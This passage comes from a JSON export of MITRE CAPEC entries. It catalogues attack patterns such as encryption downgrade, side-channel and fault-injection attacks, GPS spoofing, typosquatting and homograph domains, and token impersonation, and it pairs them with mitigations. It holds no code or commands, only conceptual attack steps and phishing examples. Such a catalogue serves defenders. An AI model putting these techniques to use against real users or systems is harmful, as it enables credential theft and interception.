available.",{"Level":"Low"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"620":{"ID":"620","Name":"Drop Encryption Level","Abstraction":"Standard","Status":"Draft","Description":"An attacker forces the encryption level to be lowered, thus enabling a successful attack against the encrypted data.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"212","Exclude_Related":{"Exclude_ID":"515"}}},"Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"757"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"621":{"ID":"621","Name":"Analysis of Packet Timing and Sizes","Abstraction":"Detailed","Status":"Draft","Description":"An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"189"}},"Prerequisites":{"Prerequisite":"Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes."},"Skills_Required":{"Skill":["These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Derive sensitive information about encrypted data."}},"Mitigations":{"Mitigation":"Distort packet sizes and timing at VPN layer by adding padding to normalize packet sizes and timing delays to reduce information leakage via timing."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"622":{"ID":"622","Name":"Electromagnetic Side-Channel Attack","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker passively monitors electromagnetic emanations that are produced by the targeted electronic device as an unintentional side-effect of its processing. From these emanations, the attacker derives information about the data that is being processed (e.g. the attacker can recover cryptographic keys by monitoring emanations associated with cryptographic processing). This style of attack requires proximal access to the device, however attacks have been demonstrated at public conferences that work at distances of up to 10-15 feet. There have not been any significant studies to determine the maximum practical distance for such attacks. Since the attack is passive, it is nearly impossible to detect and the targeted device will continue to operate as normal after a successful attack.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"189"}},"Prerequisites":{"Prerequisite":"Proximal access to the device."},"Skills_Required":{"Skill":["Sophisticated attack, but detailed techniques published in the open literature.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Derive sensitive information about encrypted data. For mobile devices, depending on which keys are compromised, the attacker may be able to decrypt VOIP communications, impersonate the targeted caller, or access the enterprise VPN server."}},"Mitigations":{"Mitigation":["Utilize side-channel resistant implementations of all crypto algorithms.","Strong physical security of all devices that contain secret key information. (even when devices are not in use)"]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"623":{"ID":"623","Name":"Compromising Emanations Attack","Abstraction":"Detailed","Status":"Draft","Description":"Compromising Emanations (CE) are defined as unintentional signals which an attacker may intercept and analyze to disclose the information processed by the targeted equipment. Commercial mobile devices and retransmission devices have displays, buttons, microchips, and radios that emit mechanical emissions in the form of sound or vibrations. Capturing these emissions can help an adversary understand what the device is doing.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"189"}},"Prerequisites":{"Prerequisite":"Proximal access to the device."},"Skills_Required":{"Skill":["Sophisticated attack.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Capture vibrations/emissions from the handset or retransmission device display screen to recreat display information from a distance."}},"Mitigations":{"Mitigation":"None are known."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"624":{"ID":"624","Name":"Hardware Fault Injection","Abstraction":"Meta","Status":"Stable","Description":"The adversary uses disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior in electronic devices. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information.","Alternate_Terms":{"Alternate_Term":{"Term":"Side-Channel Attack"}},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Prerequisites":{"Prerequisite":["Physical access to the system","The adversary must be cognizant of where fault injection vulnerabilities exist in the system in order to leverage them for exploitation."]},"Skills_Required":{"Skill":["Adversaries require non-trivial technical skills to create and implement fault injection attacks. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required.",{"Level":"High"}]},"Resources_Required":{"Resource":{"p":["The relevant sensors and tools to detect and analyze fault/side-channel data from a system.","A tool capable of injecting fault/side-channel data into a system or application."]}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Data","Bypass Protection Mechanism","Hide Activities"],"Note":"An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data."},{"Scope":"Integrity","Impact":"Execute Unauthorized Commands","Note":"If an adversary is able to inject data via a fault or side channel vulnerability towards malicious ends, the integrity of the application or information system will be compromised."}]},"Mitigations":{"Mitigation":"Implement robust physical security countermeasures and monitoring."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1247"},{"CWE_ID":"1248"},{"CWE_ID":"1256"},{"CWE_ID":"1319"},{"CWE_ID":"1332"},{"CWE_ID":"1334"}]},"Notes":{"Note":["Considerable effort on the part of the adversary is often required in order to detect and analyze fault/side channel data.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Alternate_Terms, Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Other_Notes, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Consequences, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Fault Injection",{"Date":"2020-07-30"}]}},"625":{"ID":"625","Name":"Mobile Device Fault Injection","Abstraction":"Standard","Status":"Draft","Description":"Fault injection attacks against mobile devices use disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information. Although this attack usually requires physical control of the mobile device, it is non-destructive, and the device can be used after the attack without any indication that secret keys were compromised.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"624"}},"Skills_Required":{"Skill":["Adversaries require non-trivial technical skills to create and implement fault injection attacks on mobile devices. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required. This prerequisite makes the attack challenging to perform (assuming that physical security countermeasures and monitoring are in place).",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":"Read Data","Note":"Extract long-term secret keys (e.g. keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic."}},"Mitigations":{"Mitigation":["Strong physical security of all devices that contain secret key information. (even when devices are not in use)","Frequent changes to secret keys and certificates."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}]}},"626":{"ID":"626","Name":"Smudge Attack","Abstraction":"Detailed","Status":"Draft","Description":"Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user\u2019s fingers.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"395"}},"Prerequisites":{"Prerequisite":"The attacker must have physical access to the device."},"Skills_Required":{"Skill":["The attacker must know how to make use of these smudges.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Mitigations":{"Mitigation":"Strong physical security of the device."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"627":{"ID":"627","Name":"Counterfeit GPS Signals","Abstraction":"Standard","Status":"Draft","Description":"An adversary attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These spoofed signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"148","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":"The target must be relying on valid GPS signal to perform critical operations."},"Skills_Required":{"Skill":["The ability to spoof GPS signals is not trival.",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to create spoofed GPS signals."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Data"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"628":{"ID":"628","Name":"Carry-Off GPS Attack","Abstraction":"Detailed","Status":"Draft","Description":"A common form of a GPS spoofing attack, commonly termed a carry-off attack begins with an adversary broadcasting signals synchronized with the genuine signals observed by the target receiver. The power of the counterfeit signals is then gradually increased and drawn away from the genuine signals. Over time, the adversary can carry the target away from their intended destination and toward a location chosen by the adversary.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"627","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The target must be relying on valid GPS signal to perform critical operations."},"Skills_Required":{"Skill":["This attack requires advanced knoweldge in GPS technology.",{"Level":"High"}]},"Example_Instances":{"Example":"A \\"proof-of-concept\\" attack was successfully performed in June, 2013, when the luxury yacht \\"White Rose\\" was misdirected with spoofed GPS signals from Monaco to the island of Rhodes by a group of aerospace engineering students from the Cockrell School of Engineering at the University of Texas in Austin. The students were aboard the yacht, allowing their spoofing equipment to gradually overpower the signal strengths of the actual GPS constellation satellites, altering the course of the yacht."},"References":{"Reference":{"External_Reference_ID":"REF-489","Section":"GPS Spooking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"629":{"ID":"629","Name":"Unauthorized Use of Device Resources","Abstraction":"Standard","Status":"Draft","Description":"An adversary that has previously obtained unauthorized access to certain device resources, uses that access to obtain information such as location and network information.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"114","Exclude_Related":{"Exclude_ID":"515"}}},"Skills_Required":{"Skill":["Knowledge of the affected system, including what devices are connected to it, as well as knowledge of how to extract information from these devices.",{"Level":"High"}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1290"},{"CWE_ID":"1292"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"630":{"ID":"630","Name":"TypoSquatting","Abstraction":"Detailed","Status":"Draft","Description":"An adversary registers a domain name with at least one character different than a trusted domain. A TypoSquatting attack takes advantage of instances where a user mistypes a URL (e.g. www.goggle.com) or not does visually verify a URL before clicking on it (e.g. phishing attack). As a result, the user is directed to an adversary-controlled destination. TypoSquatting does not require an attack against the trusted domain or complicated reverse engineering.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"89"},{"Nature":"CanPrecede","CAPEC_ID":"543"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target website] The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.","Technique":"Research popular or high traffic websites."},{"Step":"2","Phase":"Experiment","Description":"[Impersonate trusted domain] In order to impersonate the trusted domain, the adversary needs to register the TypoSquatted URL.","Technique":"Register the TypoSquatted domain."},{"Step":"3","Phase":"Exploit","Description":"[Deceive user into visiting domain] Finally, the adversary needs to deceive a user into visiting the TypoSquatted domain.","Technique":["Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the TypoSquatted domain.","Assume that a user will incorrectly type the legitimate URL, leading the user to the TypoSquatted domain."]}]},"Prerequisites":{"Prerequisite":"An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets."},"Skills_Required":{"Skill":["Adversaries must be able to register DNS hostnames/URL\u2019s.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"Depending on the intention of the adversary, a successful TypoSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials."}},"Mitigations":{"Mitigation":["Authenticate all servers and perform redundant checks when using DNS hostnames.","Purchase potential TypoSquatted domains and forward to legitimate domain."]},"Example_Instances":{"Example":{"p":["An adversary sends an email, impersonating paypal.com, to a user stating that they have just received a money transfer and to click the given link to obtain their money.","However, the link the in email is paypa1.com instead of paypal.com, which the user clicks without fully reading the link.","The user is directed to the adversary\'s website, which appears as if it is the legitimate paypal.com login page.","The user thinks they are logging into their account, but have actually just given their paypal credentials to the adversary. The adversary can now use the user\'s legitimate paypal credentials to log into the user\'s account and steal any money which may be in the account.","TypoSquatting vulnerability allows an adversary to impersonate a trusted domain and trick a user into visiting the malicious website to steal user credentials."]}},"References":{"Reference":{"External_Reference_ID":"REF-491"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"631":{"ID":"631","Name":"SoundSquatting","Abstraction":"Detailed","Status":"Draft","Description":"An adversary registers a domain name that sounds the same as a trusted domain, but has a different spelling. A SoundSquatting attack takes advantage of a user\'s confusion of the two words to direct Internet traffic to adversary-controlled destinations. SoundSquatting does not require an attack against the trusted domain or complicated reverse engineering.","Alternate_Terms":{"Alternate_Term":{"Term":"Homophone Attack"}},"Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"89"},{"Nature":"CanPrecede","CAPEC_ID":"543"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target website] The adversary first determines which website to impersonate, generally one that is trusted, receives a consistent amount of traffic, and is a homophone.","Technique":"Research popular or high traffic websites which are also homophones."},{"Step":"2","Phase":"Experiment","Description":"[Impersonate trusted domain] In order to impersonate the trusted domain, the adversary needs to register the SoundSquatted URL.","Technique":"Register the SoundSquatted domain."},{"Step":"3","Phase":"Exploit","Description":"[Deceive user into visiting domain] Finally, the adversary needs to deceive a user into visiting the SoundSquatted domain.","Technique":["Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the SoundSquatted domain.","Assume that a user will unintentionally use the homophone in the URL, leading the user to the SoundSquatted domain."]}]},"Prerequisites":{"Prerequisite":"An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets."},"Skills_Required":{"Skill":["Adversaries must be able to register DNS hostnames/URL\u2019s.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"Depending on the intention of the adversary, a successful SoundSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials."}},"Mitigations":{"Mitigation":["Authenticate all servers and perform redundant checks when using DNS hostnames.","Purchase potential SoundSquatted domains and forward to legitimate domain."]},"Example_Instances":{"Example":{"p":["An adversary sends an email, impersonating the popular banking website guaranteebanking.com, to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.","However, the link the in email is guarantybanking.com instead of guaranteebanking.com, which the user clicks without fully reading the link.","The user is directed to the adversary\'s website, which appears as if it is the legitimate guaranteebanking.com login page.","The user thinks they are logging into their account, but have actually just given their guaranteebanking.com credentials to the adversary. The adversary can now use the user\'s legitimate guaranteebanking.com credentials to log into the user\'s account and steal any money which may be in the account."]}},"References":{"Reference":{"External_Reference_ID":"REF-491"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"632":{"ID":"632","Name":"Homograph Attack via Homoglyphs","Abstraction":"Detailed","Status":"Draft","Description":"An adversary registers a domain name containing a homoglyph, leading the registered domain to appear the same as a trusted domain. A homograph attack leverages the fact that different characters among various character sets look the same to the user. Homograph attacks must generally be combined with other attacks, such as phishing attacks, in order to direct Internet traffic to the adversary-controlled destinations.","Alternate_Terms":{"Alternate_Term":{"Term":"Homoglyph Attack"}},"Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"89"},{"Nature":"CanPrecede","CAPEC_ID":"543"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target website] The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.","Technique":"Research popular or high traffic websites."},{"Step":"2","Phase":"Experiment","Description":"[Impersonate trusted domain] In order to impersonate the trusted domain, the adversary needs to register the URL containing the homoglpyh character(s).","Technique":"Register the Homograph domain."},{"Step":"3","Phase":"Exploit","Description":"[Deceive user into visiting domain] Finally, the adversary needs to deceive a user into visiting the Homograph domain.","Technique":"Execute a phishing attack and send a user an e-mail convincing the to click on a link leading the user to the malicious domain."}]},"Prerequisites":{"Prerequisite":"An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets."},"Skills_Required":{"Skill":["Adversaries must be able to register DNS hostnames/URL\u2019s.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"Depending on the intention of the adversary, a successful Homograph attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials."}},"Mitigations":{"Mitigation":["Authenticate all servers and perform redundant checks when using DNS hostnames.","Utilize browsers that can warn users if URLs contain characters from different character sets."]},"Example_Instances":{"Example":{"p":["An adversary sends an email, impersonating bankofamerica.com to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.","However, the link the in email is bankofamerica.com, where the \'a\' and \'e\' characters are Cyrillic and not ASCII, instead of bankofamerica.com (all ASCII), which the user clicks after carefully reading the URL, making sure that typosquatting and soundsquatting attacks are not being leveraged against them.","The user is directed to the adversary\'s website, which appears as if it is the legitimate bankofamerica.com login page.","The user thinks they are logging into their account, but have actually just given their bankofamerica.com credentials to the adversary. The adversary can now use the user\'s legitimate bankofamerica.com credentials to log into the user\'s account and steal any money which may be in the account.","Homograph vulnerability allows an adversary to impersonate a trusted domain by leveraging homoglyphs and tricking a user into visiting the malicious website to steal user credentials."]}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"633":{"ID":"633","Name":"Token Impersonation","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"194","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"This pattern of attack is only applicable when a downstream user leverages tokens to verify identity, and then takes action based on that identity."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Alter Execution Logic","Note":"By faking the source of data or services, an adversary can cause a target to make incorrect decisions about how to proceed."},{"Scope":"Integrity","Impact":"Gain Privileges","Note":"By impersonating identities that have an increased level of access, an adversary gain privilege that they many not have otherwise had."},{"Scope":"Integrity","Impact":"Hide Activities","Note":"Faking the source of data or services can be used to create a false trail in logs as the target will associated any actions with the impersonated identity instead of the adversary."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"287"},{"CWE_ID":"1270"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1134","Entry_Name":"Access Token Manipulation"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-04-12"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"}]}},"634":{"ID":"634","Name":"Probe Audio and Video Peripherals","Abstraction":"Detailed","Status":"Stable","Description":"The adversary exploits the target system\'s audio and video functionalities through malware or scheduled tasks. The goal is to capture sensitive information about the target for financial, personal, political, or other gains which is accomplished by collecting communication data between two parties via the use of peripheral devices (e.g. microphones and webcams) or applications with audio and video capabilities (e.g. Skype) on a system.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"651","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]},{"Nature":"ChildOf","CAPEC_ID":"545"}]},"Prerequisites":{"Prerequisite":"Knowledge of the target device\'s or application\u2019s vulnerabilities that can be capitalized on with malicious code. The adversary must be able to place the malicious code on the target device."},"Skills_Required":{"Skill":["To deploy a hidden process or malware on the system to automatically collect audio and video data.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Prevent unknown code from executing on a system through the use of an allowlist policy.","Patch installed applications as soon as new updates become available."]},"Example_Instances":{"Example":["An adversary can capture audio and video, and transmit the recordings to a C2 server or a similar capability.","An adversary can capture and record from audio peripherals in a vehicle via a Car Whisperer attack. If an adversary is within close proximity to a vehicle with Bluetooth capabilities, they may attempt to connect to the hands-free system when it is in pairing mode. With successful authentication, if an authentication system is present at all, an adversary may be able to play music/voice recordings, as well begin a recording and capture conversations happening inside the vehicle. Successful authentication relies on the pairing security key being set to a default value, or by brute force (which may be less practical in an outside environment) Depending on the sensitivity of the information being discussed, this scenario can be extremely compromising.","An adversary may also use a technique called Bluebugging, which is similar to Bluesnarfing but requires the adversary to be between 10-15 meters of the target device. Bluebugging creates a backdoor for an attacker to listen/record phone calls, forward calls, send SMS and retrieve the phonebook."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"267"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1123","Entry_Name":"Audio Capture"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1125","Entry_Name":"Video 